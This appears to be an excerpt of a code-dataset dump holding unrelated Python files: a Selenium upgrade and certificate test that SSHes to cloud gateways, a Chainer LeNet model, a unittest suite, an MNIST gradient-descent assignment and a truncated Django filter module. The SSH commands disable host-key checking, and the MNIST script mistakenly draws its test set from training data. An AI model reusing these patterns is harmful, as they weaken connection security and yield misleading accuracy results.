time.sleep(2)\r\n upgrade_view.check_upgrade_page()\r\n self.logger.info(\"At upgrade page\")\r\n\r\n self.cases.start_test(\"test_case_1\")\r\n self.logger.info(\"Upgrade to a custom release\")\r\n upgrade_view.custom_version = self.cases.case_data[\"custom_version\"]\r\n self.logger.info(\"Click Upgrade to Custom version\")\r\n upgrade_view.click_custom_version_upgrade()\r\n\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(3)\r\n self.logger.info(\"Sign in again to check the current version\")\r\n relogin.login(self.cases.case_data['username'], self.cases.case_data[\"password\"])\r\n time.sleep(6)\r\n\r\n self.logger.info(\"Check current version under Help\")\r\n time.sleep(10)\r\n current_version = actions_in_common.get_current_version()\r\n self.logger.info(\"Current version is \" + current_version)\r\n self.assertIn(self.cases.expected_result['custom_version'], current_version)\r\n\r\n self.logger.info(\"Navigating to Troubleshooting\")\r\n title = diagnostic_view.navigate_to_troubleshooting()\r\n self.assertEqual(\"Troubleshoot\", title, \"Troubleshooting link does not exist\")\r\n self.logger.info(\"Navigating to Diagnostic\")\r\n diagnostic_view.navigate_to_diagnostics()\r\n self.logger.info(\"Check if Diagnostic is the right page\")\r\n self.assertTrue(diagnostic_view.current_url(), \"Not on the Diagnostic page\")\r\n time.sleep(10)\r\n\r\n self.logger.info(\"Disable Security\")\r\n diagnostic_view.change_security_setting(\"off\")\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(15)\r\n\r\n self.logger.info(\"Navigating to Settings\")\r\n upgrade_view.navigate_to_settings()\r\n time.sleep(1)\r\n self.logger.info(\"Navigating to Upgrade\")\r\n upgrade_view.navigate_to_upgrade()\r\n time.sleep(2)\r\n self.logger.info('Click Upgrade to the latest')\r\n upgrade_view.click_latest_version_upgrade()\r\n\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(10)\r\n self.logger.info(\"Sign in again to check the current version\")\r\n relogin.login(self.cases.case_data['username'], self.cases.case_data[\"password\"])\r\n time.sleep(6)\r\n\r\n self.logger.info(\"Check current version under Help\")\r\n time.sleep(10)\r\n current_version = actions_in_common.get_current_version()\r\n self.logger.info(\"Current version is \" + current_version)\r\n self.assertIn(self.cases.expected_result['latest_version'], current_version)\r\n\r\n self.cases.end_test(\"test_case_1\")\r\n\r\n def test02_create_2_gateways(self):\r\n gateway_view = gateway.Gateway(self.driver)\r\n actions_in_common = actions.ActionsInCommon(self.driver)\r\n\r\n self.logger.info(\"Navigating to Gateway\")\r\n gateway_view.navigate_to_gateway()\r\n time.sleep(10)\r\n self.logger.info(\"Checking Gateway is present in the current view area...\")\r\n self.assertTrue(gateway_view.is_gateway_table_present(), \"Gateway view is not present\")\r\n\r\n self.logger.info(\"Start to create 2 gateways for AWS, ARM and Gcloud respectively\")\r\n self.cases.start_test(\"test_case_2\")\r\n\r\n for gw in self.cases.case_data:\r\n self.logger.info(\"Click New Gateway button\")\r\n gateway_view.click_new_gateway_button()\r\n time.sleep(5)\r\n self.assertTrue(gateway_view.new_gateway_panel_is_present(), \"New Gateway panel is not found\")\r\n\r\n assert gateway_view.fill_new_gateway_fields(**self.cases.case_data[gw]), \"Failed to fill in Gateway configuration fields\"\r\n\r\n time.sleep(1)\r\n self.logger.info(\"Clicking OK to create New Gateway...\")\r\n self.assertTrue(actions_in_common.click_ok_button(), \"Failed to click OK for new gateway\")\r\n\r\n actions_in_common.wait_progress_bar()\r\n self.driver.refresh()\r\n time.sleep(15)\r\n self.logger.info(\"Checking new gateway's state in gateway table\")\r\n self.assertEquals(gateway_view.gateway_table.check_specific_row_data(self.driver, self.cases.case_data[gw]['06.gateway_name'], 2), self.cases.expected_result['status'],\r\n \"Gateway state is not up.\")\r\n\r\n self.cases.end_test(\"test_case_2\")\r\n\r\n def test03_upgrade_to_preview(self):\r\n upgrade_view = upgd.Upgrade(self.driver)\r\n actions_in_common = actions.ActionsInCommon(self.driver)\r\n relogin = actions.UCCLogin(self.driver)\r\n gateway_view = gateway.Gateway(self.driver)\r\n diagnostic_view = diag.Diagnostics(self.driver)\r\n sshc = SSHCmd()\r\n time.sleep(5)\r\n\r\n gateway_public_ip_addresses = {}\r\n\r\n self.logger.info(\"Navigating to Settings\")\r\n upgrade_view.navigate_to_settings()\r\n time.sleep(1)\r\n\r\n self.logger.info(\"Navigating to Upgrade\")\r\n upgrade_view.navigate_to_upgrade()\r\n time.sleep(2)\r\n\r\n self.cases.start_test(\"test_case_3\")\r\n self.logger.info(\"Input the custom release version\")\r\n upgrade_view.custom_version = self.cases.case_data[\"custom_version\"]\r\n self.logger.info(\"Click Upgrade to Custom version\")\r\n upgrade_view.click_custom_version_upgrade()\r\n\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(3)\r\n self.logger.info(\"Sign in again to check the current version\")\r\n relogin.login(self.cases.case_data['username'], self.cases.case_data[\"password\"])\r\n time.sleep(6)\r\n\r\n self.logger.info(\"Check current version under Help\")\r\n time.sleep(10)\r\n current_version = actions_in_common.get_current_version()\r\n self.logger.info(\"Current version is \" + current_version)\r\n self.assertIn(self.cases.expected_result['custom_version'], current_version)\r\n\r\n self.logger.info(\"Start to verify the cert is not deployed because the setting is disabled\")\r\n self.logger.info(\"Get the gateway's public IP\")\r\n gateway_view.navigate_to_gateway()\r\n time.sleep(15)\r\n\r\n for gw_name in self.cases.case_data['gateway_names']:\r\n if \"arm\" in gw_name:\r\n column_no = 10\r\n else:\r\n column_no = 8\r\n self.logger.info(\r\n gw_name + \"'s public IP is \" + gateway_view.gateway_table.check_specific_row_data(self.driver, gw_name,\r\n column_no))\r\n gateway_public_ip_addresses[gw_name] = gateway_view.gateway_table.check_specific_row_data(self.driver,\r\n gw_name,\r\n column_no)\r\n\r\n\r\n self.logger.info(\"SSH connect Controller\")\r\n hostip = self.cases.case_data['hostip']\r\n user = self.cases.case_data['ssh_user']\r\n passwd = self.cases.case_data['ssh_password']\r\n kf = os.path.abspath(self.cases.case_data['key_filename'])\r\n sshc.ssh_connect(hostip,user,passwd,kf)\r\n\r\n for gw, gw_ip in gateway_public_ip_addresses.items():\r\n to_gw = \"wget --spider -S https://{} 2>&1 | grep 'insecurely'\".format(gw_ip)\r\n cmd_putput1 = sshc.send_command(to_gw)\r\n self.logger.info(\" output of the command: \" + ''.join(cmd_putput1))\r\n self.assertIn(self.cases.expected_result['response'], cmd_putput1[0])\r\n scom = \" wget --spider -S https://{} 2>&1 | grep 'insecurely'\".format(hostip)\r\n if 'arm' in gw:\r\n keyname = gw + \".key\"\r\n else:\r\n keyname = gw + \".pem\"\r\n to_controller = \"sudo ssh -o StrictHostKeyChecking=no -i /var/cloudx/{} ubuntu@{}\".format(keyname,\r\n gw_ip) + scom\r\n cmd_putput2 = sshc.send_command(to_controller)\r\n self.logger.info(\" output of the command: \" + ''.join(cmd_putput2))\r\n self.assertIn(self.cases.expected_result['response'], cmd_putput2[0])\r\n\r\n self.logger.info(\"Start to test when the certificate is deployed\")\r\n self.logger.info(\"Enable security with HTTPS certificate\")\r\n\r\n self.logger.info(\"Navigating to Troubleshooting\")\r\n title = diagnostic_view.navigate_to_troubleshooting()\r\n self.logger.info(\"Navigating to Diagnostic\")\r\n diagnostic_view.navigate_to_diagnostics()\r\n time.sleep(10)\r\n\r\n self.logger.info(\"Enable Security\")\r\n diagnostic_view.change_security_setting(\"on\")\r\n time.sleep(20)\r\n actions_in_common.wait_progress_bar()\r\n time.sleep(15)\r\n\r\n for gw, gw_ip in gateway_public_ip_addresses.items():\r\n to_gw = \"sudo wget --spider -S https://{} --certificate=/etc/ssl/certs/ctrl.crt --private-key=/etc/ssl/private/ctrl.key --ca-certificate=/etc/ssl/certs/ca.pem 2>&1 | grep HTTP/\".format(gw_ip)\r\n cmd_output1 = sshc.send_command(to_gw)\r\n self.logger.info(\" output of the command: \" + ''.join(cmd_output1))\r\n self.assertIn(self.cases.expected_result['response_code'], cmd_output1[0])\r\n scom = \" wget --spider -S https://{} 2>&1 | grep HTTP/\".format(hostip)\r\n if 'arm' in gw:\r\n keyname = gw + \".key\"\r\n else:\r\n keyname = gw + \".pem\"\r\n to_controller = \"sudo ssh -o StrictHostKeyChecking=no -i /var/cloudx/{} ubuntu@{}\".format(keyname,\r\n gw_ip) + scom\r\n cmd_output2 = sshc.send_command(to_controller)\r\n self.logger.info(\" output of the command: \" + ''.join(cmd_output2))\r\n self.assertIn(self.cases.expected_result['response_code'], cmd_output2[0])\r\n\r\n self.logger.info(\"Start to delete those 2 gateways for AWS, ARM and Gcloud created for this test\")\r\n self.logger.info(\"Navigating to Gateway\")\r\n gateway_view.navigate_to_gateway()\r\n time.sleep(10)\r\n\r\n for gw_name in self.cases.case_data['gateway_names']:\r\n gateway_view.delete_gateway(gw_name)\r\n time.sleep(3)\r\n self.logger.info(\"Clicking OK to delete the specified gateway...\")\r\n actions_in_common.confirm_ok()\r\n\r\n actions_in_common.wait_progress_bar()\r\n self.driver.refresh()\r\n time.sleep(15)\r\n self.logger.info(\"Verifying deleted gateway is no longer in gateway list\")\r\n self.assertFalse(gateway_view.gateway_table.is_data_present(self.driver, 2, gw_name),\r\n \"Found the specified gateway\")\r\n time.sleep(5)\r\n\r\n self.cases.end_test(\"test_case_3\")\r\n\r\n\r\n\r\n","sub_path":"autotest/frontend/settings/upgrade/upgrade_check_cert.py","file_name":"upgrade_check_cert.py","file_ext":"py","file_size_in_byte":12254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"384183165","text":"import chainer\nfrom src.function.activation import relu\nfrom src.function.reshape import flatten\nfrom src.function.pooling import max_pooling_2d\nfrom src.link.convolution_2d import Convolution2D\nfrom src.link.linear import Linear\nfrom src.link.last_linear import LastLinear\n\n\nclass LeNet(chainer.Chain):\n \"\"\"LeNet-like architecture.\n We followed [Lower bounds on the robustness to adversarial perturbations]\n (https://papers.nips.cc/paper/6682-lower-bounds-on-the-robustness-to-adversarial-perturbations).\n\n conv-5x5 channel 20, stride 1x1\n max_pool-2x2 stride 2x2\n conv-5x5 channel 50, stride 1x1\n max_pool-2x2 stride 2x2\n fc 500\n activation\n fc 10\n \"\"\"\n\n def __init__(self):\n super(LeNet, self).__init__()\n initialW = chainer.initializers.HeNormal()\n with self.init_scope():\n self.conv1 = Convolution2D(in_channels=None, out_channels=20, ksize=5, stride=1,\n pad=0, initialW=initialW, nobias=False)\n self.conv2 = Convolution2D(in_channels=20, out_channels=50, ksize=5, stride=1,\n pad=0, initialW=initialW, nobias=False)\n self.fc1 = Linear(500)\n self.fc2 = LastLinear(10)\n\n def __call__(self, x):\n x = self.conv1(x)\n x = relu(x)\n x = max_pooling_2d(x, ksize=2, stride=2, pad=0)\n x = self.conv2(x)\n x = relu(x)\n x = max_pooling_2d(x, ksize=2, stride=2, pad=0)\n x = flatten(x)\n x = self.fc1(x)\n x = relu(x)\n x = self.fc2(x)\n return x\n","sub_path":"src/model/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"595064562","text":"#-*- coding:utf-8 -*-\n''' \n#文件名:\n#作者:陈圆圆\n#创建日期:\n#模块描述:\n#历史修改记录\n#修改人:\n#修改日期:\n#修改内容:\n'''\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\n#导入驱动\nsys.path.append(\"/testIsomp/common/\")\nfrom _initDriver import initDriver\nsys.path.append(\"/testIsomp/testCase/department/\")\nfrom test_department import testDepartment\nsys.path.append(\"/testIsomp/testSuite/common_suite_file/\")\nfrom common_suite_file import setDriver,CommonSuiteData\nimport unittest\n\nclass testDepartSuite(unittest.TestCase):\n\n\tdef setUp(self):\n\n\t\t#调用驱动\n\t\tself.browser = setDriver().set_driver()\n\n\t\tself.comsuit = CommonSuiteData(self.browser)\n\t\tself.testdptment = testDepartment(self.browser)\n\n\t\t#部门前置条件\n\t\tself.comsuit.depart_module_prefix_condition()\n\n\tdef test_department(self):\n\n\t\tu'''添加和编辑部门'''\n\t\tself.testdptment.add_edit_department_001()\n\t\tu'''上移和下移部门'''\n\t\tself.testdptment.up_down_department_002()\n\t\tu'''上移和下移部门校验'''\n\t\tself.testdptment.up_down_department_check_003()\n\t\tu'''检验添加和编辑部门'''\n\t\tself.testdptment.check_add_edit_department_004()\n\t\tu'''删除部门'''\n\t\tself.testdptment.del_department_005()\n\n\tdef tearDown(self):\n\t\tself.comsuit.user_quit()\n\t\tinitDriver().close_driver(self.browser)\n\nif __name__ == \"__main__\":\n\tunittest.main()\n","sub_path":"testSuite/test_002_department_suite.py","file_name":"test_002_department_suite.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"603200883","text":"from pylab import *\nimport numpy as np\nfrom scipy.io import loadmat\n\nM = loadmat(\"mnist_all.mat\")\n\n\n################################ PART 1 ####################################\n\n\ndef showDigits():\n '''\n Load the dataset from mnist_all.mat. Randomly choose 100 pictures, 10 for each digit\n Combines the 100 pictures to 1 picture and show the picture.\n '''\n M = loadmat(\"mnist_all.mat\")\n\n f, axarr = plt.subplots(10, 10)\n np.random.seed(1)\n for i in range(10):\n digit = \"train\" + str(i)\n shape = M[digit].shape\n for j in range(10):\n rand = np.random.randint(0, shape[0])\n axarr[i, j].imshow(M[digit][rand].reshape((28, 28)), cmap=cm.gray)\n plt.setp([axarr[i, j].get_xticklabels()], visible=False)\n plt.setp([axarr[i, j].get_yticklabels()], visible=False)\n\n plt.show()\n\n\n################################ PART 2 ####################################\n\n\ndef softmax(y):\n '''Return the output of the softmax function for the matrix of output y. y\n is an NxM matrix where N is the number of outputs for a single case, and M\n is the number of cases'''\n return exp(y) / tile(sum(exp(y), 0), (len(y), 1))\n\n\ndef forward_p2(x, w, b):\n '''\n the input x should be 784 x n, the input w should be 784 x 10, the input b\n should be 10 x 1 in our case\n '''\n Os = dot(w.T, x) + b\n result = softmax(Os)\n return result\n\n\n################################ PART 3 ####################################\n\n\ndef NLL(y, y_):\n return -sum(y_ * log(y))\n\n\ndef grad_p3(x, w, b, y):\n '''\n return the gradient of weights and the gradient of biases\n '''\n p = forward_p2(x, w, b)\n dc_do = p - y\n return np.dot(dc_do, x.T).T, np.dot(dc_do, np.ones((x.shape[1], 1)))\n\n\ndef cost(p, y):\n cost = 0\n for i in range(p.shape[1]):\n cost += NLL(p[:, i], y[:, i])\n return cost\n\n\ndef check_grad_w(xn, wn, b, y, grad_w):\n h = 0.0001\n wh = np.zeros((784, 10))\n difference_matrix = np.ones((784, 10))\n error = 0\n for j in range(wn.shape[0]):\n for k in range(wn.shape[1]):\n wh[j, k] = h / 2\n\n wn_m = wn - wh\n p_m = forward_p2(xn, wn_m, b)\n # cost0 = 0\n # for i in range(25):\n # cost0 += NLL(p_m[:, i], y[:, i])\n cost0 = cost(p_m, y)\n\n wn_p = wn + wh\n p_p = forward_p2(xn, wn_p, b)\n cost1 = cost(p_p, y)\n\n difference_matrix[j, k] = (cost1 - cost0) / h - grad_w[j, k]\n error += abs((cost1 - cost0) / h - grad_w[j, k])\n wh[j, k] = 0\n # print(difference_matrix)\n print(\n \"The sum of the absolute value of difference for a 784 x 10 matrix is \" + str(\n error))\n print(\n \"The average of the absolute value of difference for a 784 x 10 matrix is \" + str(\n error / 7840))\n\n\ndef check_grad_b(xn, wn, b, y, grad_b):\n h = 0.0001\n bh = np.zeros(b.shape)\n error = 0\n for j in range(b.shape[0]):\n bh[j, 0] = h / 2\n b_p = b + bh\n b_m = b - bh\n p_p = forward_p2(xn, wn, b_p)\n p_m = forward_p2(xn, wn, b_m)\n\n cost0 = cost(p_m, y)\n\n cost1 = cost(p_p, y)\n\n error += abs((cost1 - cost0) / h - grad_b[j, 0])\n bh[j, 0] = 0\n print(\n \"The sum of the absolute value of difference for a 10 x 1 matrix is \" + str(\n error))\n print(\n \"The average of the absolute value of difference for a 10 x 1 matrix is \" + str(\n error / 10))\n\n\ndef part3():\n # generating random numbers for test purpose\n np.random.seed(0)\n xn = np.random.rand(784, 25)\n b = np.random.rand(10, 1)\n y = np.zeros((10, 25))\n j = 0\n for i in range(25):\n y[j, i] = 1\n j = (j + 1) % 10\n wn = np.random.rand(784, 10)\n\n # calculate the gradient value for weights and b\n grad_w, grad_b = grad_p3(xn, wn, b, y)\n\n # verifying the gradient for weights using finite differences\n check_grad_w(xn, wn, b, y, grad_w)\n\n # verifying the gradient for biases using finite differences\n check_grad_b(xn, wn, b, y, grad_b)\n\n\n################################ PART 4 ####################################\n\n\ndef perform(data, weight, bias, answer):\n result = forward_p2(data, weight, bias)\n # correct = 0\n # for i in range(result.shape[1]):\n # if argmax(result[:, i]) == argmax(answer[:, i]):\n # correct += 1\n # return correct / result.shape[1]\n return np.mean(np.argmax(answer, 0) == np.argmax(result, 0))\n\n\ndef grad_descent(f, df, x, y, init_t, init_b, alpha, max_iter, test, t_answer,\n validation, v_answer, plotCurve=True):\n EPS = 1e-5 # EPS = 10**(-5)\n prev_t = init_t - 10 * EPS\n t = init_t.copy()\n prev_b = init_b - 10 * EPS\n b = init_b.copy()\n iter = 0\n perfomance_x = [perform(x, t, b, y)]\n perfomance_t = [perform(test, t, b, t_answer)]\n perfomance_v = [perform(validation, t, b, v_answer)]\n iterations = [0]\n print('Doing gradient Descent')\n while (np.linalg.norm(t - prev_t) + np.linalg.norm(\n b - prev_b)) > EPS and iter < max_iter:\n prev_t = t.copy()\n prev_b = b.copy()\n grad_t, grad_b = df(x, t, b, y)\n t -= alpha * grad_t\n b -= alpha * grad_b\n if iter % 100 == 0:\n print(\"Iter\", iter)\n print(\"f(x) = %.2f\" % (f(forward_p2(x, t, b), y)))\n # print(\"Gradient: \", df(x, t, b, y), \"\\n\")\n if plotCurve:\n perfomance_x.append(perform(x, t, b, y))\n perfomance_t.append(perform(test, t, b, t_answer))\n perfomance_v.append(perform(validation, t, b, v_answer))\n iterations.append(iter + 1)\n iter += 1\n if plotCurve:\n plt.plot(iterations, perfomance_x)\n plt.plot(iterations, perfomance_t)\n plt.plot(iterations, perfomance_v)\n plt.legend(['Training Set', 'Test Set', 'Validation Set'],\n loc='upper right')\n plt.axis([-30, max_iter, 0, 1])\n plt.ylabel('Prop. of correct guesses')\n plt.xlabel('Iterations')\n plt.show()\n print('Final Cost is ' + format(f(forward_p2(x, t, b), y), '.2f'))\n return t, b\n\n\ndef get_sets():\n x = np.zeros((784, 4000 * 10))\n y = np.zeros((10, 4000 * 10))\n test_set = np.zeros((784, 850 * 10))\n answer_set = np.zeros((10, 850 * 10))\n validation_set = np.zeros((784, 1000 * 10))\n v_answer_set = np.zeros((10, 1000 * 10))\n np.random.seed(0)\n for i in range(10):\n train = \"train\" + str(i)\n test = \"test\" + str(i)\n train_a = M[train].copy()\n test_a = M[train].copy()\n np.random.shuffle(train_a)\n np.random.shuffle(test_a)\n\n one_hot = [0] * 10\n one_hot[i] = 1\n x[:, 4000 * i:4000 * (i + 1)] = (train_a[0:4000]).T / 255.0\n y[:, 4000 * i:4000 * (i + 1)] = np.array([one_hot] * 4000).T\n test_set[:, 850 * i:850 * (i + 1)] = (test_a[0:850]).T / 255.0\n answer_set[:, 850 * i:850 * (i + 1)] = np.array([one_hot] * 850).T\n validation_set[:, 1000 * i:1000 * (i + 1)] = (train_a[\n 4000:5000]).T / 255.0\n v_answer_set[:, 1000 * i:1000 * (i + 1)] = np.array([one_hot] * 1000).T\n return x, y, test_set, answer_set, validation_set, v_answer_set\n\n\ndef part4(iter, graph=True):\n x, y, test_set, answer_set, validation_set, v_answer_set = get_sets()\n # np.random.seed(0)\n init_t = np.zeros((784, 10))\n init_b = np.zeros((10, 1))\n t, b = grad_descent(cost, grad_p3, x, y, init_t, init_b, 0.00003, iter,\n test_set, answer_set, validation_set,\n v_answer_set, graph) # 3000 has highest percentage\n np.savetxt('weight.txt', t)\n np.savetxt('bias.txt', b)\n f, axarr = plt.subplots(2, 5)\n for i in range(10):\n axarr[i // 5, i % 5].imshow(t[:, i].reshape((28, 28)), cmap=\"RdBu\")\n axarr[i // 5, i % 5].set_title('Digit' + str(i))\n plt.show()\n\n\n################################ PART 5 ####################################\n\n\ndef grad_descent_m(f, df, x, y, init_t, init_b, alpha, gamma, max_iter, test,\n t_answer, validation, v_answer, plotCurve=True):\n EPS = 1e-5 # EPS = 10**(-5)\n prev_t = init_t - 10 * EPS\n t = init_t.copy()\n prev_b = init_b - 10 * EPS\n b = init_b.copy()\n vt = 0\n vb = 0\n iter = 0\n perfomance_x = [perform(x, t, b, y)]\n perfomance_t = [perform(test, t, b, t_answer)]\n perfomance_v = [perform(validation, t, b, v_answer)]\n iterations = [0]\n print('Doing gradient Descent')\n while (np.linalg.norm(t - prev_t) + np.linalg.norm(\n b - prev_b)) > EPS and iter < max_iter:\n prev_t = t.copy()\n prev_b = b.copy()\n grad_t, grad_b = df(x, t, b, y)\n vt = gamma * vt + alpha * grad_t\n vb = gamma * vb + alpha * grad_b\n t -= vt\n b -= vb\n if iter % 100 == 0:\n print(\"Iter\", iter)\n print(\"f(x) = %.2f\" % (f(forward_p2(x, t, b), y)))\n # print(\"Gradient: \", df(x, t, b, y), \"\\n\")\n if plotCurve:\n perfomance_x.append(perform(x, t, b, y))\n perfomance_t.append(perform(test, t, b, t_answer))\n perfomance_v.append(perform(validation, t, b, v_answer))\n iterations.append(iter + 1)\n iter += 1\n if plotCurve:\n plt.plot(iterations, perfomance_x)\n plt.plot(iterations, perfomance_t)\n plt.plot(iterations, perfomance_v)\n plt.legend(['Training Set', 'Test Set', 'Validation Set'],\n loc='upper right')\n plt.axis([-30, max_iter, 0, 1])\n plt.ylabel('Prop. of correct guesses')\n plt.xlabel('Iterations')\n plt.show()\n print('Final Cost is ' + format(f(forward_p2(x, t, b), y), '.2f'))\n return t, b\n\n\ndef part5(iter, graph=True):\n x, y, test_set, answer_set, validation_set, v_answer_set = get_sets()\n init_t = np.zeros((784, 10))\n init_b = np.zeros((10, 1))\n t, b = grad_descent_m(cost, grad_p3, x, y, init_t, init_b, 0.00003, 0.9,\n iter,\n test_set, answer_set, validation_set,\n v_answer_set, graph) # 3000 has highest percentage\n np.savetxt('weight_m.txt', t)\n np.savetxt('bias_m.txt', b)\n\n\n################################ PART 6 ####################################\n\ndef part6_grad_descent_vanilla(x, y, b, init_w, alpha, max_iter, weight1, weight2, digit1, digit2):\n gd_traj = []\n\n w_adj = np.zeros([784, 10])\n w_adj[weight1][digit1] = 1\n w_adj[weight2][digit2] = 1\n\n EPS = 1e-5\n w = init_w.copy()\n prev_W = w - 10 * EPS\n iter = 0\n\n while norm(w - prev_W) > EPS and iter < max_iter:\n if iter % 1 == 0:\n # print(((w * w_adj)[weight1][digit1], (w * w_adj)[weight2][digit2]))\n gd_traj.append(((w * w_adj)[weight1][digit1], (w * w_adj)[weight2][digit2]))\n prev_W = w.copy()\n w -= alpha * grad_p3(x, w, b, y)[0] * w_adj\n iter += 1\n\n return gd_traj\n\n\ndef part6_grad_descent_momentum(x, y, b, init_w, alpha, gamma, max_iter, weight1, weight2, digit1, digit2):\n mo_traj = []\n\n w_adj = np.zeros([784, 10])\n w_adj[weight1][digit1] = 1\n w_adj[weight2][digit2] = 1\n\n EPS = 1e-5\n w = init_w.copy()\n prev_W = w - 10 * EPS\n iter = 0\n v = 0\n\n while norm(w - prev_W) > EPS and iter < max_iter:\n if iter % 1 == 0:\n # print(((w * w_adj)[weight1][digit1], (w * w_adj)[weight2][digit2]))\n mo_traj.append(((w * w_adj)[weight1][digit1], (w * w_adj)[weight2][digit2]))\n prev_W = w.copy()\n v = gamma * v + alpha * grad_p3(x, w, b, y)[0] * w_adj\n w -= v\n iter += 1\n\n return mo_traj\n\n\ndef part6a():\n w = np.loadtxt('weight_m.txt')\n b = np.loadtxt('bias_m.txt')\n b = b.reshape((10, 1))\n x = get_sets()[0]\n y = get_sets()[1]\n weight1 = 11 * 28 + 11\n weight2 = 17 * 28 + 17\n\n w1s = np.arange(-1.2, 1.1, 0.2)\n w2s = np.arange(-1.2, 1.1, 0.2)\n w1z, w2z = np.meshgrid(w1s, w2s)\n C = np.zeros([w1s.size, w2s.size])\n k = 0\n for i, w1 in enumerate(w1s):\n for j, w2 in enumerate(w2s):\n w[weight1][2] = w1\n w[weight2][2] = w2\n p = forward_p2(x, w, b)\n C[i, j] = cost(p, y)\n k += 1\n # print(k)\n\n CS = plt.contour(w1z, w2z, C, 15)\n plt.legend(loc='upper left')\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Contour plot')\n plt.show()\n\n\ndef part6bc():\n w = np.loadtxt('weight_m.txt')\n b = np.loadtxt('bias_m.txt')\n b = b.reshape((10, 1))\n x = get_sets()[0]\n y = get_sets()[1]\n weight1 = 11 * 28 + 11\n weight2 = 17 * 28 + 17\n\n w[weight1][2] = 0.8\n w[weight2][2] = 0.8\n\n alpha = 0.0003\n gamma = 0.7\n\n gd_traj = part6_grad_descent_vanilla(x, y, b, w, alpha, 20, weight1, weight2, 2, 2)\n mo_traj = part6_grad_descent_momentum(x, y, b, w, alpha, gamma, 20, weight1, weight2, 2, 2)\n\n w1s = np.arange(-1.2, 1.1, 0.2)\n w2s = np.arange(-1.2, 1.1, 0.2)\n w1z, w2z = np.meshgrid(w1s, w2s)\n C = np.zeros([w1s.size, w2s.size])\n k = 0\n for i, w1 in enumerate(w1s):\n for j, w2 in enumerate(w2s):\n w[weight1][2] = w1\n w[weight2][2] = w2\n p = forward_p2(x, w, b)\n C[i, j] = cost(p, y)\n k += 1\n # print(k)\n\n CS = plt.contour(w1z, w2z, C, 15)\n plt.plot([a for a, b in gd_traj], [b for a, b in gd_traj], 'yo-', label=\"No Momentum\")\n plt.plot([a for a, b in mo_traj], [b for a, b in mo_traj], 'go-', label=\"Momentum\")\n plt.legend(loc='upper left')\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Contour plot')\n plt.show()\n\n\ndef part6e():\n w = np.loadtxt('weight_m.txt')\n b = np.loadtxt('bias_m.txt')\n b = b.reshape((10, 1))\n x = get_sets()[0]\n y = get_sets()[1]\n weight1 = 0\n weight2 = 783\n\n w[weight1][2] = 0.8\n w[weight2][2] = 0.8\n\n alpha = 0.0003\n gamma = 0.7\n\n gd_traj = part6_grad_descent_vanilla(x, y, b, w, alpha, 20, weight1, weight2, 2, 2)\n mo_traj = part6_grad_descent_momentum(x, y, b, w, alpha, gamma, 20, weight1, weight2, 2, 2)\n\n w1s = np.arange(-1.2, 1.1, 0.2)\n w2s = np.arange(-1.2, 1.1, 0.2)\n w1z, w2z = np.meshgrid(w1s, w2s)\n C = np.zeros([w1s.size, w2s.size])\n k = 0\n for i, w1 in enumerate(w1s):\n for j, w2 in enumerate(w2s):\n w[weight1][2] = w1\n w[weight2][2] = w2\n p = forward_p2(x, w, b)\n C[i, j] = cost(p, y)\n k += 1\n # print(k)\n\n CS = plt.contour(w1z, w2z, C, 15)\n plt.plot([a for a, b in gd_traj], [b for a, b in gd_traj], 'yo-', label=\"No Momentum\")\n plt.plot([a for a, b in mo_traj], [b for a, b in mo_traj], 'go-', label=\"Momentum\")\n plt.legend(loc='upper left')\n plt.clabel(CS, inline=1, fontsize=10)\n plt.title('Contour plot')\n plt.show()\n\n\nif __name__ == \"__main__\":\n # showDigits()\n\n M = loadmat(\"mnist_all.mat\")\n x = M[\"train5\"][148:149].T / 255.0\n result = forward_p2(x, np.random.rand(784, 10), 0.2)\n # print(result)\n\n # part3()\n #\n # part4(1500)\n #\n # part5(1500)\n\n # part6a()\n\n # part6bc()\n\n part6e()","sub_path":"36/proj2/digits_part6.py","file_name":"digits_part6.py","file_ext":"py","file_size_in_byte":15295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"421608807","text":"from django.contrib.auth.models import User\nimport django_filters\nfrom django.http import JsonResponse, HttpResponse\nfrom .models import Album\nfrom django_filters import filters\nfrom filters.views import FilterMixin\nfrom . import views\nimport music.views\nfrom django.shortcuts import get_object_or_404\n\nUZYTKOWNICY = User.objects.all().order_by('username').values_list(\"id\",\"username\").distinct()\nUZYTKOWNICY = list(UZYTKOWNICY)\n# UZYTKOWNICY.insert(0, ('0','---------') )\nUZYTKOWNICY.pop(3)\n\nAKTYWNOWSCI = Album.objects.all().order_by('aktywnosc').values_list(\"aktywnosc\",\"aktywnosc\").distinct()\nAKTYWNOWSCI = list(AKTYWNOWSCI)\n# AKTYWNOWSCI.insert(0, ('','---------') )\n\nMIASTA = Album.objects.all().order_by('miejscowosc').values_list(\"miejscowosc\",\"miejscowosc\").distinct()\nMIASTA = list(MIASTA)\n# MIASTA.insert(0, ('0','---------') )\n\nKODY = Album.objects.all().values_list(\"kodpocztowy\",\"kodpocztowy\").distinct()\nKODY = list(KODY)\n# KODY.insert(0, ('0','---------') )\n\n# TERMINY = Album.objects.all().values_list(\"termin\",\"termin\").distinct()\n# IMPORTOWANA = music.views.ZMIENNAGLOBALNA\n# INNEMIASTA = Album.objects.filter(aktywnosc='Urlop').values_list('miejscowosc', 'miejscowosc').distinct()\n\nUSER_IDs = []\nAKTYWNOWSCI_IDs = []\n\ndef dynamiczne_filtrowanie(request):\n\n ajax_aktywnosc = request.GET.get('aktywnosc', False)\n ajax_user = request.GET.get('user', False)\n print (\"To jest user ktory przyszedł %s.\" % ajax_user)\n print (type(ajax_user))\n\n global AKTYWNOWSCI_IDs\n global USER_IDs\n global uzytkownik\n print (ajax_aktywnosc)\n\n # if ajax_user == \"user=\":\n # print ('jestem false')\n # else:\n # print('nie jestm false')\n if not ajax_user:\n USER_IDs = []\n else:\n user_dane = ajax_user.split('&')\n USER_IDs = []\n for x in user_dane:\n y = 